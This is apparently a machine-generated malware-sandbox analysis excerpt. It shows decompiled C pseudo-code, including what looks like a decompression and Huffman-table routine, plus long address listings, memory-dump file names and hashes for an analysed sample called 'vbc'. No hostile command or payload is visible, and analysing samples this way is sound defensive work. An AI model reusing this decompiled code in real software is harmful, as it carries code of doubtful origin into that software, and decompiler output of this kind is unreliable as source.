                                                													__cl =  *(__ebp - 4);
                                                													 *__esi =  *__esi & 0x00000000;
                                                													__eflags =  *__esi;
                                                													__esi[4] = __al;
                                                													__eax =  *(__ebp - 0x18);
                                                													__esi[5] =  *(__ebp - 0x18);
                                                													__eax =  *(__ebp - 0x1c);
                                                													__esi[4] = __cl;
                                                													__esi[6] =  *(__ebp - 0x1c);
                                                													goto L101;
                                                												}
                                                												L99:
                                                												__eflags = __edi - 0x101;
                                                												if(__edi > 0x101) {
                                                													goto L9;
                                                												}
                                                												goto L100;
                                                											}
                                                										case 0xe:
                                                											goto L9;
                                                										case 0xf:
                                                											L175:
                                                											__eax =  *(__ebp - 0x30);
                                                											__esi[0x26ea] =  *(__ebp - 0x30);
                                                											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                											__ecx = __esi[0x26ea];
                                                											__edx = __esi[0x26e9];
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x30) = __ecx;
                                                											if(__ecx >= __edx) {
                                                												__eax = __esi[0x26e8];
                                                												__eax = __esi[0x26e8] - __ecx;
                                                												__eflags = __eax;
                                                											} else {
                                                												__edx = __edx - __ecx;
                                                												__eax = __edx - __ecx - 1;
                                                											}
                                                											__eflags = __ecx - __edx;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ecx != __edx) {
                                                												L183:
                                                												__edi = 0;
                                                												goto L10;
                                                											} else {
                                                												L179:
                                                												__eax = __esi[0x145];
                                                												__eflags = __eax - 8;
                                                												 *__esi = __eax;
                                                												if(__eax != 8) {
                                                													L184:
                                                													0 = 1;
                                                													goto L10;
                                                												}
                                                												goto L180;
                                                											}
                                                									}
                                                								}
                                                								L181:
                                                								goto L9;
                                                							}
                                                							L70:
                                                							if( *__edi == __eax) {
                                                								goto L72;
                                                							}
                                                							L71:
                                                							__esi[2] = __esi[2] & __eax;
                                                							 *__esi = 0xd;
                                                							goto L93;
                                                						}
                                                					}
                                                				}
                                                				L182:
                                                				_t443 = 0;
                                                				_t446[0x147] =  *(_t448 - 0x40);
                                                				_t446[0x146] = _t425;
                                                				( *(_t448 + 8))[1] = 0;
                                                				goto L11;
                                                			}









                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d85
                                                0x00406d89
                                                0x00000000
                                                0x00000000
                                                0x00406d8f
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d9a
                                                0x00406d9c
                                                0x00406d9f
                                                0x00406da2
                                                0x00406da5
                                                0x00406da5
                                                0x00406da8
                                                0x00000000
                                                0x00000000
                                                0x00406daa
                                                0x00406daa
                                                0x00406dad
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dbd
                                                0x00406b1c
                                                0x00406b1c
                                                0x00406b1f
                                                0x00406b25
                                                0x00406b2b
                                                0x00406b34
                                                0x00406b3a
                                                0x00406b3d
                                                0x00406b44
                                                0x00406b49
                                                0x00406b4f
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406dc3
                                                0x00406dc3
                                                0x00406dcd
                                                0x00000000
                                                0x00000000
                                                0x00406dd3
                                                0x00406dd3
                                                0x00406dd7
                                                0x00406dda
                                                0x00406dda
                                                0x00406dde
                                                0x00406de4
                                                0x00406de4
                                                0x00406de7
                                                0x00406dea
                                                0x00406df0
                                                0x00000000
                                                0x00000000
                                                0x00406df2
                                                0x00406e14
                                                0x00406e14
                                                0x00406e17
                                                0x00000000
                                                0x00000000
                                                0x00406df4
                                                0x00406df8
                                                0x00000000
                                                0x00000000
                                                0x00406dfe
                                                0x00406dfe
                                                0x00406e01
                                                0x00406e04
                                                0x00406e09
                                                0x00406e0b
                                                0x00406e0e
                                                0x00406e11
                                                0x00406e11
                                                0x00406e19
                                                0x00406e19
                                                0x00406e1f
                                                0x00406e22
                                                0x00406e25
                                                0x00406e25
                                                0x00406e2c
                                                0x00406e30
                                                0x00406e34
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e40
                                                0x00406e45
                                                0x00000000
                                                0x00000000
                                                0x00406e47
                                                0x00406e5b
                                                0x00406e5b
                                                0x00406e5f
                                                0x00000000
                                                0x00000000
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e53
                                                0x00406e58
                                                0x00406e58
                                                0x00406e58
                                                0x00406e61
                                                0x00406e61
                                                0x00406e64
                                                0x00406e72
                                                0x00406e78
                                                0x00406e7d
                                                0x00406e83
                                                0x00406e89
                                                0x00406e8f
                                                0x00406e96
                                                0x00406eaa
                                                0x00406eaa
                                                0x00407479
                                                0x00407479
                                                0x00407479
                                                0x0040747e
                                                0x00000000
                                                0x00000000
                                                0x00406ab6
                                                0x00406ab6
                                                0x00000000
                                                0x004070b1
                                                0x004070b1
                                                0x004070b5
                                                0x004070b8
                                                0x004070bb
                                                0x004070be
                                                0x00000000
                                                0x00000000
                                                0x004070c4
                                                0x004070c4
                                                0x004070e9
                                                0x004070e9
                                                0x004070e9
                                                0x004070eb
                                                0x00000000
                                                0x00000000
                                                0x004070c9
                                                0x004070c9
                                                0x004070cd
                                                0x00000000
                                                0x00000000
                                                0x004070d3
                                                0x004070d3
                                                0x004070d6
                                                0x004070d9
                                                0x004070dc
                                                0x004070de
                                                0x004070e0
                                                0x004070e3
                                                0x004070e6
                                                0x004070e6
                                                0x004070e6
                                                0x004070ed
                                                0x004070ed
                                                0x004070f5
                                                0x004070f8
                                                0x004070fb
                                                0x004070fe
                                                0x00407102
                                                0x00407105
                                                0x00407107
                                                0x0040710a
                                                0x0040710c
                                                0x00407120
                                                0x00407120
                                                0x00407123
                                                0x0040713d
                                                0x0040713d
                                                0x00407140
                                                0x00000000
                                                0x00000000
                                                0x00407146
                                                0x00407146
                                                0x00407149
                                                0x00000000
                                                0x00000000
                                                0x0040714f
                                                0x0040714f
                                                0x00000000
                                                0x0040714f
                                                0x00407125
                                                0x00407128
                                                0x0040712f
                                                0x00407132
                                                0x00000000
                                                0x00407132
                                                0x0040710e
                                                0x00407112
                                                0x00407115
                                                0x00000000
                                                0x00000000
                                                0x0040715a
                                                0x0040715a
                                                0x0040717f
                                                0x0040717f
                                                0x0040717f
                                                0x00407181
                                                0x00000000
                                                0x00000000
                                                0x0040715f
                                                0x0040715f
                                                0x00407163
                                                0x00000000
                                                0x00000000
                                                0x00407169
                                                0x00407169
                                                0x0040716c
                                                0x0040716f
                                                0x00407172
                                                0x00407174
                                                0x00407176
                                                0x00407179
                                                0x0040717c
                                                0x0040717c
                                                0x0040717c
                                                0x00407183
                                                0x0040718b
                                                0x0040718e
                                                0x00407191
                                                0x00407193
                                                0x00407196
                                                0x00407196
                                                0x00407198
                                                0x0040719c
                                                0x0040719f
                                                0x004071a2
                                                0x004071a5
                                                0x00000000
                                                0x00000000
                                                0x004071ab
                                                0x004071ab
                                                0x004071d0
                                                0x004071d0
                                                0x004071d0
                                                0x004071d2
                                                0x00000000
                                                0x00000000
                                                0x004071b0
                                                0x004071b0
                                                0x004071b4
                                                0x00000000
                                                0x00000000
                                                0x004071ba
                                                0x004071ba
                                                0x004071bd
                                                0x004071c0
                                                0x004071c3
                                                0x004071c5
                                                0x004071c7
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071cd
                                                0x004071d4
                                                0x004071d4
                                                0x004071dc
                                                0x004071df
                                                0x004071e2
                                                0x004071e5
                                                0x004071e9
                                                0x004071ec
                                                0x004071ee
                                                0x004071f1
                                                0x004071f4
                                                0x0040720e
                                                0x0040720e
                                                0x00407211
                                                0x00000000
                                                0x00000000
                                                0x00407217
                                                0x00407217
                                                0x0040721a
                                                0x00407221
                                                0x00000000
                                                0x00407221
                                                0x004071f6
                                                0x004071f9
                                                0x00407200
                                                0x00407203
                                                0x00000000
                                                0x00000000
                                                0x00407229
                                                0x00407229
                                                0x0040724e
                                                0x0040724e
                                                0x0040724e
                                                0x00407250
                                                0x00000000
                                                0x00000000
                                                0x0040722e
                                                0x0040722e
                                                0x00407232
                                                0x00000000
                                                0x00000000
                                                0x00407238
                                                0x00407238
                                                0x0040723b
                                                0x0040723e
                                                0x00407241
                                                0x00407243
                                                0x00407245
                                                0x00407248
                                                0x0040724b
                                                0x0040724b
                                                0x0040724b
                                                0x00407252
                                                0x0040725a
                                                0x0040725d
                                                0x00407260
                                                0x00407262
                                                0x00407265
                                                0x00407265
                                                0x00407267
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407270
                                                0x00407275
                                                0x00407277
                                                0x0040727d
                                                0x0040727f
                                                0x00407294
                                                0x00407296
                                                0x00407296
                                                0x00407281
                                                0x00407287
                                                0x00407289
                                                0x0040728b
                                                0x0040728b
                                                0x00407298
                                                0x0040729c
                                                0x0040729f
                                                0x004072a5
                                                0x004072a5
                                                0x004072a8
                                                0x004072a8
                                                0x004072a8
                                                0x004072aa
                                                0x00000000
                                                0x00000000
                                                0x004072b0
                                                0x004072b0
                                                0x004072b6
                                                0x004072b8
                                                0x004072dd
                                                0x004072e0
                                                0x004072e6
                                                0x004072eb
                                                0x004072f1
                                                0x004072f7
                                                0x004072f9
                                                0x004072fc
                                                0x00407305
                                                0x0040730b
                                                0x0040730b
                                                0x004072fe
                                                0x00407300
                                                0x00407302
                                                0x00407302
                                                0x0040730d
                                                0x00407313
                                                0x00407315
                                                0x00407318
                                                0x0040731a
                                                0x00407320
                                                0x00407322
                                                0x00407324
                                                0x00407326
                                                0x00407328
                                                0x0040732b
                                                0x00407334
                                                0x00407337
                                                0x00407337
                                                0x0040732d
                                                0x0040732d
                                                0x00407330
                                                0x00407330
                                                0x0040732b
                                                0x00407322
                                                0x00407339
                                                0x0040733b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040733b
                                                0x004072ba
                                                0x004072ba
                                                0x004072c0
                                                0x004072c6
                                                0x004072c8
                                                0x00000000
                                                0x00000000
                                                0x004072ca
                                                0x004072ca
                                                0x004072cc
                                                0x004072ce
                                                0x004072d7
                                                0x004072d7
                                                0x004072d0
                                                0x004072d0
                                                0x004072d3
                                                0x004072d3
                                                0x004072d9
                                                0x004072db
                                                0x00000000
                                                0x00000000
                                                0x00407341
                                                0x00407341
                                                0x00407346
                                                0x00407348
                                                0x00407349
                                                0x0040734a
                                                0x0040734b
                                                0x00407351
                                                0x00407354
                                                0x00407357
                                                0x0040735a
                                                0x0040735c
                                                0x00407362
                                                0x00407362
                                                0x00407365
                                                0x00407365
                                                0x00407365
                                                0x00407365
                                                0x0040736e
                                                0x00000000
                                                0x00000000
                                                0x00407373
                                                0x00407373
                                                0x00407376
                                                0x00407379
                                                0x0040737b
                                                0x00407412
                                                0x00407412
                                                0x00407415
                                                0x00407417
                                                0x00407418
                                                0x00407419
                                                0x0040741c
                                                0x00000000
                                                0x0040741c
                                                0x00407381
                                                0x00407381
                                                0x00407387
                                                0x00407389
                                                0x004073ae
                                                0x004073b1
                                                0x004073b7
                                                0x004073bc
                                                0x004073c2
                                                0x004073c8
                                                0x004073ca
                                                0x004073cd
                                                0x004073d6
                                                0x004073dc
                                                0x004073dc
                                                0x004073cf
                                                0x004073d1
                                                0x004073d3
                                                0x004073d3
                                                0x004073de
                                                0x004073e4
                                                0x004073e6
                                                0x004073e9
                                                0x004073eb
                                                0x004073f1
                                                0x004073f3
                                                0x004073f5
                                                0x004073f7
                                                0x004073f9
                                                0x004073fc
                                                0x00407405
                                                0x00407408
                                                0x00407408
                                                0x004073fe
                                                0x004073fe
                                                0x00407401
                                                0x00407401
                                                0x004073fc
                                                0x004073f3
                                                0x0040740a
                                                0x0040740c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040740c
                                                0x0040738b
                                                0x0040738b
                                                0x00407391
                                                0x00407397
                                                0x00407399
                                                0x00000000
                                                0x00000000
                                                0x0040739b
                                                0x0040739b
                                                0x0040739d
                                                0x0040739f
                                                0x004073a6
                                                0x004073a6
                                                0x004073a8
                                                0x004073a1
                                                0x004073a1
                                                0x004073a3
                                                0x004073a3
                                                0x004073aa
                                                0x004073ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407424
                                                0x00407424
                                                0x00407427
                                                0x00407429
                                                0x0040742c
                                                0x0040742f
                                                0x0040742f
                                                0x0040742f
                                                0x0040742f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406add
                                                0x00406ac1
                                                0x00000000
                                                0x00406ac7
                                                0x00406aca
                                                0x00406ad4
                                                0x00406ad7
                                                0x00406ada
                                                0x00000000
                                                0x00406ada
                                                0x00406ac1
                                                0x00406ae5
                                                0x00406ae8
                                                0x00406aec
                                                0x00406af6
                                                0x00406b00
                                                0x00406b03
                                                0x00406b09
                                                0x00406c3d
                                                0x00406c3f
                                                0x00406c45
                                                0x00406c48
                                                0x00406c4b
                                                0x00000000
                                                0x00406c4b
                                                0x00406b0f
                                                0x00406b0f
                                                0x00406b10
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6f
                                                0x00406c15
                                                0x00406c15
                                                0x00406c1a
                                                0x00406c1d
                                                0x00406c22
                                                0x00406c25
                                                0x00406c2a
                                                0x00406c2d
                                                0x00406c32
                                                0x00406c35
                                                0x00406c35
                                                0x00000000
                                                0x00406b75
                                                0x00406b75
                                                0x00406b75
                                                0x00406b75
                                                0x00406b79
                                                0x00406b79
                                                0x00406b9b
                                                0x00406b9e
                                                0x00406ba0
                                                0x00406ba3
                                                0x00406ba8
                                                0x00406b7e
                                                0x00406b7e
                                                0x00406b83
                                                0x00406b85
                                                0x00406b87
                                                0x00406b8c
                                                0x00406b92
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406b8e
                                                0x00406b8e
                                                0x00406b8e
                                                0x00406b8c
                                                0x00000000
                                                0x00406baa
                                                0x00406bd7
                                                0x00406bdc
                                                0x00406bde
                                                0x00406bdf
                                                0x00406be1
                                                0x00406be2
                                                0x00406be2
                                                0x00406be2
                                                0x00406c0a
                                                0x00406c0f
                                                0x00406c0f
                                                0x00000000
                                                0x00406c0f
                                                0x00406ba8
                                                0x00406b6f
                                                0x00406b12
                                                0x00406b12
                                                0x00406b13
                                                0x00406b5d
                                                0x00000000
                                                0x00406b5d
                                                0x00406b15
                                                0x00406b16
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c72
                                                0x00406c72
                                                0x00406c72
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c52
                                                0x00406c52
                                                0x00406c56
                                                0x00000000
                                                0x00000000
                                                0x00406c5c
                                                0x00406c5c
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c67
                                                0x00406c69
                                                0x00406c6c
                                                0x00406c6f
                                                0x00406c6f
                                                0x00406c6f
                                                0x00406c77
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7c
                                                0x00406c81
                                                0x00406c84
                                                0x00406c86
                                                0x00406c89
                                                0x00000000
                                                0x00000000
                                                0x00406c8f
                                                0x00406c8f
                                                0x00406c91
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00000000
                                                0x00000000
                                                0x00406ca1
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca6
                                                0x00406d44
                                                0x00406d44
                                                0x00406d47
                                                0x00406d49
                                                0x00406d49
                                                0x00406d4c
                                                0x00406d4f
                                                0x00406d51
                                                0x00406d53
                                                0x00406d55
                                                0x00406d55
                                                0x00406d5e
                                                0x00406d63
                                                0x00406d66
                                                0x00406d69
                                                0x00406d6c
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d78
                                                0x00406d78
                                                0x00406d7e
                                                0x00406d7e
                                                0x00406d7e
                                                0x00000000
                                                0x00406d72
                                                0x00406cac
                                                0x00406cac
                                                0x00406cb2
                                                0x00406cb5
                                                0x00406cb7
                                                0x00406ce2
                                                0x00406ce5
                                                0x00406ceb
                                                0x00406cf0
                                                0x00406cf6
                                                0x00406cfc
                                                0x00406cfe
                                                0x00406d01
                                                0x00406d0a
                                                0x00406d10
                                                0x00406d10
                                                0x00406d03
                                                0x00406d05
                                                0x00406d07
                                                0x00406d07
                                                0x00406d12
                                                0x00406d18
                                                0x00406d1b
                                                0x00406d1d
                                                0x00406d1f
                                                0x00406d25
                                                0x00406d27
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d35
                                                0x00406d35
                                                0x00406d37
                                                0x00406d2e
                                                0x00406d2e
                                                0x00406d31
                                                0x00406d31
                                                0x00406d39
                                                0x00406d39
                                                0x00406d27
                                                0x00406d3c
                                                0x00406d3e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406d3e
                                                0x00406cb9
                                                0x00406cb9
                                                0x00406cbf
                                                0x00406cc5
                                                0x00406cc7
                                                0x00000000
                                                0x00000000
                                                0x00406cc9
                                                0x00406cc9
                                                0x00406ccb
                                                0x00406ccd
                                                0x00406cd0
                                                0x00406cd7
                                                0x00406cd7
                                                0x00406cd9
                                                0x00406cd2
                                                0x00406cd2
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cdb
                                                0x00406cdd
                                                0x00406ce0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406de4
                                                0x00406de7
                                                0x00406dea
                                                0x00406df0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fc7
                                                0x00406fc7
                                                0x00406fc7
                                                0x00406fca
                                                0x00406fcd
                                                0x00406fcf
                                                0x00406fd2
                                                0x00406fd8
                                                0x00406fdf
                                                0x00406fe1
                                                0x00000000
                                                0x00000000
                                                0x00406eb5
                                                0x00406eb5
                                                0x00406edd
                                                0x00406edd
                                                0x00406edd
                                                0x00406edf
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ebd
                                                0x00406ec1
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406eca
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed2
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406eda
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee1
                                                0x00406ee9
                                                0x00406eec
                                                0x00406ef2
                                                0x00406ef5
                                                0x00406ef9
                                                0x00406efd
                                                0x00406f00
                                                0x00406f03
                                                0x00406f1b
                                                0x00406f1b
                                                0x00406f1e
                                                0x00406f2c
                                                0x00406f2f
                                                0x00406f20
                                                0x00406f20
                                                0x00406f22
                                                0x00406f29
                                                0x00406f29
                                                0x00406f58
                                                0x00406f58
                                                0x00406f58
                                                0x00406f5b
                                                0x00406f5d
                                                0x00000000
                                                0x00000000
                                                0x00406f38
                                                0x00406f38
                                                0x00406f3c
                                                0x00000000
                                                0x00000000
                                                0x00406f42
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4d
                                                0x00406f4f
                                                0x00406f52
                                                0x00406f55
                                                0x00406f55
                                                0x00406f55
                                                0x00406f5f
                                                0x00406f5f
                                                0x00406f61
                                                0x00406f63
                                                0x00406f6e
                                                0x00406f71
                                                0x00406f74
                                                0x00406f76
                                                0x00406f78
                                                0x00406f7a
                                                0x00406f7d
                                                0x00406f80
                                                0x00406f85
                                                0x00406f88
                                                0x00406f8b
                                                0x00406f8e
                                                0x00406f95
                                                0x00406f98
                                                0x00406f9a
                                                0x00000000
                                                0x00000000
                                                0x00406fa0
                                                0x00406fa0
                                                0x00406fa4
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb5
                                                0x00406fb7
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbd
                                                0x00406fbe
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406fc4
                                                0x00000000
                                                0x00406fc4
                                                0x00406fa6
                                                0x00406fa6
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x00406faf
                                                0x00406faf
                                                0x00000000
                                                0x00406faf
                                                0x00406f05
                                                0x00406f05
                                                0x00406f07
                                                0x00406f09
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f13
                                                0x00406f13
                                                0x00406fe7
                                                0x00406fe7
                                                0x00406fea
                                                0x00406ff1
                                                0x00406ff5
                                                0x00406ff7
                                                0x00406ffa
                                                0x00406ffd
                                                0x00407002
                                                0x00407005
                                                0x00407007
                                                0x00407008
                                                0x0040700b
                                                0x00407016
                                                0x00407019
                                                0x00407030
                                                0x00407035
                                                0x0040703c
                                                0x00407041
                                                0x00407045
                                                0x00407047
                                                0x00407047
                                                0x00407047
                                                0x0040704a
                                                0x0040704c
                                                0x00000000
                                                0x00407052
                                                0x00407052
                                                0x00407056
                                                0x00407061
                                                0x00407074
                                                0x00407079
                                                0x0040707e
                                                0x00407080
                                                0x00000000
                                                0x00000000
                                                0x00407086
                                                0x00407086
                                                0x00407089
                                                0x0040708b
                                                0x00407099
                                                0x00407099
                                                0x0040709c
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x00000000
                                                0x004070ae
                                                0x0040708d
                                                0x0040708d
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407093
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407432
                                                0x00407432
                                                0x00407438
                                                0x0040743e
                                                0x00407443
                                                0x00407449
                                                0x0040744f
                                                0x00407451
                                                0x00407454
                                                0x0040745d
                                                0x00407463
                                                0x00407463
                                                0x00407456
                                                0x00407458
                                                0x0040745a
                                                0x0040745a
                                                0x00407465
                                                0x00407467
                                                0x0040746a
                                                0x004074a5
                                                0x004074a5
                                                0x00000000
                                                0x0040746c
                                                0x0040746c
                                                0x0040746c
                                                0x00407472
                                                0x00407475
                                                0x00407477
                                                0x004074ac
                                                0x004074ae
                                                0x00000000
                                                0x004074ae
                                                0x00000000
                                                0x00407477
                                                0x00000000
                                                0x00406ab6
                                                0x00407484
                                                0x00000000
                                                0x00407484
                                                0x00406e98
                                                0x00406e9a
                                                0x00000000
                                                0x00000000
                                                0x00406e9c
                                                0x00406e9c
                                                0x00406e9f
                                                0x00000000
                                                0x00406e9f
                                                0x00406de4
                                                0x00406da5
                                                0x00407489
                                                0x0040748c
                                                0x0040748e
                                                0x00407497
                                                0x0040749d
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                				signed int _v8;
                                                				unsigned int _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				intOrPtr* _v32;
                                                				signed int* _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				void _v116;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				signed int _v240;
                                                				signed int _t166;
                                                				signed int _t168;
                                                				intOrPtr _t175;
                                                				signed int _t181;
                                                				void* _t182;
                                                				intOrPtr _t183;
                                                				signed int* _t184;
                                                				signed int _t186;
                                                				signed int _t187;
                                                				signed int* _t189;
                                                				signed int _t190;
                                                				intOrPtr* _t191;
                                                				intOrPtr _t192;
                                                				signed int _t193;
                                                				signed int _t195;
                                                				signed int _t200;
                                                				signed int _t205;
                                                				void* _t207;
                                                				short _t208;
                                                				signed char _t222;
                                                				signed int _t224;
                                                				signed int _t225;
                                                				signed int* _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				void* _t235;
                                                				signed int _t236;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t251;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t259;
                                                				signed int _t262;
                                                				void* _t263;
                                                				void* _t264;
                                                				signed int _t267;
                                                				intOrPtr _t269;
                                                				intOrPtr _t271;
                                                				signed int _t274;
                                                				intOrPtr* _t275;
                                                				unsigned int _t276;
                                                				void* _t277;
                                                				signed int _t278;
                                                				intOrPtr* _t279;
                                                				signed int _t281;
                                                				intOrPtr _t282;
                                                				intOrPtr _t283;
                                                				signed int* _t284;
                                                				signed int _t286;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t296;
                                                				signed int* _t297;
                                                				intOrPtr _t298;
                                                				void* _t299;
                                                
                                                				_t278 = _a8;
                                                				_t187 = 0x10;
                                                				memset( &_v116, 0, _t187 << 2);
                                                				_t189 = _a4;
                                                				_t233 = _t278;
                                                				do {
                                                					_t166 =  *_t189;
                                                					_t189 =  &(_t189[1]);
                                                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                					_t233 = _t233 - 1;
                                                				} while (_t233 != 0);
                                                				if(_v116 != _t278) {
                                                					_t279 = _a28;
                                                					_t267 =  *_t279;
                                                					_t190 = 1;
                                                					_a28 = _t267;
                                                					_t234 = 0xf;
                                                					while(1) {
                                                						_t168 = 0;
                                                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                							break;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						if(_t190 <= _t234) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v8 = _t190;
                                                					if(_t267 < _t190) {
                                                						_a28 = _t190;
                                                					}
                                                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                						_t234 = _t234 - 1;
                                                						if(_t234 != 0) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v28 = _t234;
                                                					if(_a28 > _t234) {
                                                						_a28 = _t234;
                                                					}
                                                					 *_t279 = _a28;
                                                					_t181 = 1 << _t190;
                                                					while(_t190 < _t234) {
                                                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                						if(_t182 < 0) {
                                                							L64:
                                                							return _t168 | 0xffffffff;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						_t181 = _t182 + _t182;
                                                					}
                                                					_t281 = _t234 << 2;
                                                					_t191 = _t299 + _t281 - 0x70;
                                                					_t269 =  *_t191;
                                                					_t183 = _t181 - _t269;
                                                					_v52 = _t183;
                                                					if(_t183 < 0) {
                                                						goto L64;
                                                					}
                                                					_v176 = _t168;
                                                					 *_t191 = _t269 + _t183;
                                                					_t192 = 0;
                                                					_t235 = _t234 - 1;
                                                					if(_t235 == 0) {
                                                						L21:
                                                						_t184 = _a4;
                                                						_t271 = 0;
                                                						do {
                                                							_t193 =  *_t184;
                                                							_t184 =  &(_t184[1]);
                                                							if(_t193 != _t168) {
                                                								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                								_t236 =  *_t232;
                                                								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                								 *_t232 = _t236 + 1;
                                                							}
                                                							_t271 = _t271 + 1;
                                                						} while (_t271 < _a8);
                                                						_v16 = _v16 | 0xffffffff;
                                                						_v40 = _v40 & 0x00000000;
                                                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                						_t195 = _v8;
                                                						_t186 =  ~_a28;
                                                						_v12 = _t168;
                                                						_v180 = _t168;
                                                						_v36 = 0x432190;
                                                						_v240 = _t168;
                                                						if(_t195 > _v28) {
                                                							L62:
                                                							_t168 = 0;
                                                							if(_v52 == 0 || _v28 == 1) {
                                                								return _t168;
                                                							} else {
                                                								goto L64;
                                                							}
                                                						}
                                                						_v44 = _t195 - 1;
                                                						_v32 = _t299 + _t195 * 4 - 0x70;
                                                						do {
                                                							_t282 =  *_v32;
                                                							if(_t282 == 0) {
                                                								goto L61;
                                                							}
                                                							while(1) {
                                                								_t283 = _t282 - 1;
                                                								_t200 = _a28 + _t186;
                                                								_v48 = _t283;
                                                								_v24 = _t200;
                                                								if(_v8 <= _t200) {
                                                									goto L45;
                                                								}
